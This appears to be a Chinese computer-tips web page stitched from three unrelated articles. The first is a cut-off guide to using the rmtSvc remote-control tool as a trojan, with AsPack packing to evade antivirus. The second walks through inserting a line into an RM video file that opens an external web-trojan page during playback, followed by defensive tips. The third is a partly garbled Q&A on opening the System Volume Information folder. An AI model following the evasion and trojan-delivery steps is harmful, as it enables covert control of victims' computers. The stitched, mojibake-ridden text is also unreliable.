rmtSvc&vIDC应用实战

有IE,想黑就黑!
  首先在http://www.sixvee.com/520yy/tools/rmtsvc247.rar下载rmtSvc&vIDC的最新版本2.4.7版(以下简称rmtSvc)。简单点说,rmtSvc是一款集FTP、Telnet服务、Proxy服务以及vIDC服务的远程控制工具。用户可以通过此款工具方便地对远程计算机进行控制。此工具和其它远程控制工具不同,它采用B/S结构(无需安装),用户可通过浏览器进行远程控制(我们的口号是:有IE,想黑就黑!)。
  下面,笔者就以入侵控制的实例来为大家分别介绍rmtSvc常用功能的使用方法及技巧。解压下载后的压缩包,先别急着让rmtSvc.exe在目标机运行(未加壳的程序会遭到杀毒软件的查杀),笔者先告诉大家如何给源程序加壳从而避免被查杀吧(不然就没得玩了-_-|)。在http://www.sixvee.com/520yy/tools/AsPack.rar下载加壳程序AsPack Ver2.12版,运行程序,进入“选项”菜单,勾选“保留额外数据”,然后“打开文件”,选择源程序rmtSvc.exe后就会自动压缩了。
  特别提醒:压缩后的rmtSvc.exe不会被杀毒软件查杀,而且文件体积会减少近50%(经过金山毒霸6增强版、KV2005、诺顿2005测试),如果想进一步增强隐蔽性,请参考2004年第50期G9版《披着羊皮的狼——将Radmin改造为百分百木马》一文介绍的“超级捆绑”软件的使用方法。wWw.itcOmpuTer.CoM.cN木马程序的欺骗发送本文就不作进一步讨论了。
武装rmtSvc,“暗杀”杀毒软件
  1.打开浏览器输入http://IP:port(其中IP为被控机的IP地址,port为rmtSvc的服务端口,默认为7778)。连接成功后将会看到如图1的欢迎登录画面,输入访问密码(默认为123456),就可以进行rmtSvc所支持的操作(如果之前已经连同msnlib.dll和webe目录都发给了对方,那么rmtSvc将会多出用MSN进行远程控制和HTTP方式文件管理的功能)。  
RM文件中木马

  五一期间,到处都人满为患,我还是选择在家度过不长不短的七天长假,其实和我有同样安排的人有很多,比如佳佳MM就是如此。为了缓解前段时间工作的压力,她打算安安静静地呆在家里哪也不去,准备和各种各样的大片一同度过,正所谓“五一七天乐,在家也快乐”。www.sq120.com推荐文章
  五一刚过了两天,第三天一大早醒来,我突然接到了佳佳MM的求助电话。“东渝哥哥,我想给你商量一件事,今天中午我请你吃饭好吗?”这样一句话使得躺在床上的我以为自己在做梦,连掐了自己几下。“难道是鸿门宴!要知道以前我请她吃饭,都不肯赏脸,今天居然请我吃饭,一定是有求于我。”果然不出所料,在吃饭的时候,佳佳MM说自己的系统可能中了木马程序,让他帮忙看看。
  吃人嘴短,没有办法,吃完饭后我来到MM家里。在认真查看了系统的进程后,发现一个可疑的“iexplore.exe”进程。“这不是IE浏览器的进程吗,我没有运行啊,怎么会有这个进程呢?”我的心中泛起了疑惑,“看来你的系统一定是中了某种木马程序,IE浏览器是被它调用的。”
  “我这几天除了下载了三部电影,什么也没有下载啊!”MM说道。于是我对这三部电影进行检查,发现果然不出所料,里面有一些奇怪的链接。看来是中了网页木马,这个简单,找到这个网页,然后对症下药,清除掉系统中的木马。
  “看几部电影就会中木马?”佳佳MM不解地问道。“你不是说只有RealPlayer播放器的用户才会中木马的吗?我用的可是MPC啊,怎么也中木马了呢?”我只好解释:“以前是只有RealPlayer播放器才能中网页木马的,可现在的入侵方法日新月异,简直是防不胜防啊。正好今天有空,给你露一手,看看入侵者如何在RM文件中加入恶意代码的。”说做就做,马上动手给MM演示。
再现RM木马恶作剧
  “由于RM文件是网络上最常用的多媒体文件类型之一,所以通过这种方法进行网页木马的传播,可以让受危害的用户面更加的广。其实这种方法最早是用于传播网络广告的,而现在已经被入侵者利用,并且给普通的RM文件加入网页木马的链接的操作也并不复杂,通过一些现成的工具就可以完成,比如Helix Producer Plus、RealMedia Editor。”我给MM先介绍一下。
  “首先要准备一个RM视频文件作为网页木马传播的原材料,最好有一些吸引人的内容,不然受害者就不会观看到木马触发的那个时间段。另外还有一个好处就是,当用户津津有味地观看电影的时候,是不会在乎弹出的网页的。”我补充了一下。
  我首先打开记事本程序,新建一个文本文件,在上面输入下面一段代码,然后将其保存为mm.txt:
  u 00:00:20.0 00:00:30.0 &&_rpexternal&&http://www.cpcw.com/test.htm
  我来解释一下这段代码的意思。其中u是事件标志(Flag),表示要在文件中插入的是一个URL地址。接着第三个字段表示起止时间点,单位格式是“小时:分:秒.毫秒”,最后一个字段是你要弹出的URL的地址,“ _rpexternal”参数表示在外部浏览器打开URL,而不是使用缺省的Realplayer内嵌的浏览器打开URL。这里表明当播放到第20秒或者将播放进度拖到第20秒至30秒之间的任意时间时,RM文件都会自动调用系统默认的浏览器打开“http://www.cpcw.com/test.htm”的这个网页链接,从而将木马程序安装到用户的系统中。
  接着我运行RM视频文件编辑工具RealMedia Editor,点击“文件”菜单下的“打开Real媒体文件”命令来打开先前准备好的那段正常的RM视频文件,然后点击“工具”菜单下的“合并事件”命令,选择刚才保存的那个文本文件。最后点击“文件”菜单下的“RealMedia文件另存为”命令,将它另存为一个全新的RM文件,这样一个携带了网页木马的RM文件就制作完成了。

为MM支招
  对于这种恶意的RM文件的防范,不同的情况可以采用不同的方法。对于那些可以下载到硬盘中的RM文件,我们可以通过一款名为“Real 媒体过滤器”的软件对可疑的RM文件进行处理,将其中可能包含的一些外加的网页链接和特效去除掉。运行“Real 媒体过滤器”,在“源文件”和“另存为”选项后进行相应的设置,然后点击“开始过滤”按钮就可去除可疑RM文件中的多余链接(如图2)。过滤完成后,程序会弹出一个对话框并提示过滤的内容。
  另外,如果用户使用MPC进行播放的话,可以把Real媒体文件的解码类型设置为DirectShow即可,因为使用DirectShow格式可以自动屏蔽掉这些广告。但因为RM文件是Real公司的独家格式,所以DirectShow格式对于一些特殊的RM文件不能解码。这时就只有使用RealMedia格式进行播放了,但自动屏蔽广告的功能将失效。
  最后提醒广大可爱的MM,及时到微软网站去下载最新的安全补丁,堵住系统以及软件的漏洞;安装最新的反病毒软件并及时更新病毒库;安装网络防火墙,封堵不需要的端口,并对试图连接互联网的进程进行认真的筛选。

 
如何访问“System Volume Information”文件夹

牐犖剩何业南低澄猈indows XP,分区都是NTFS格式,我想为“System Volume Information”文件夹减肥,却发现此文件夹打不开,弹出对话框显示无法访问。请问我应该怎样做?(本文是电脑知识网 WWW.SQ120.COM 推荐文章)

牐牬穑骸癝ystem Volume Information”文件夹是一个隐藏的系统文件夹,系统还原工具使用该文件夹来存储它的信息和还原点。想要获得对该文件夹的访问,请遵循如下步骤:首先以管理员权限登录,打开资源管理器,然后选择“工具→文件夹选项→清除‘使用简单文件共享(推荐)’复选框→确定”,接下来右击想要“减肥”的System Volume Information 文件夹之后点击“属性→安全→添加”,最后键入要授予该文件夹访问权限的用户的名称(通常是登录时使用的账户)。单击确定之后,就可以正常操作“System Volume Information”文件夹了。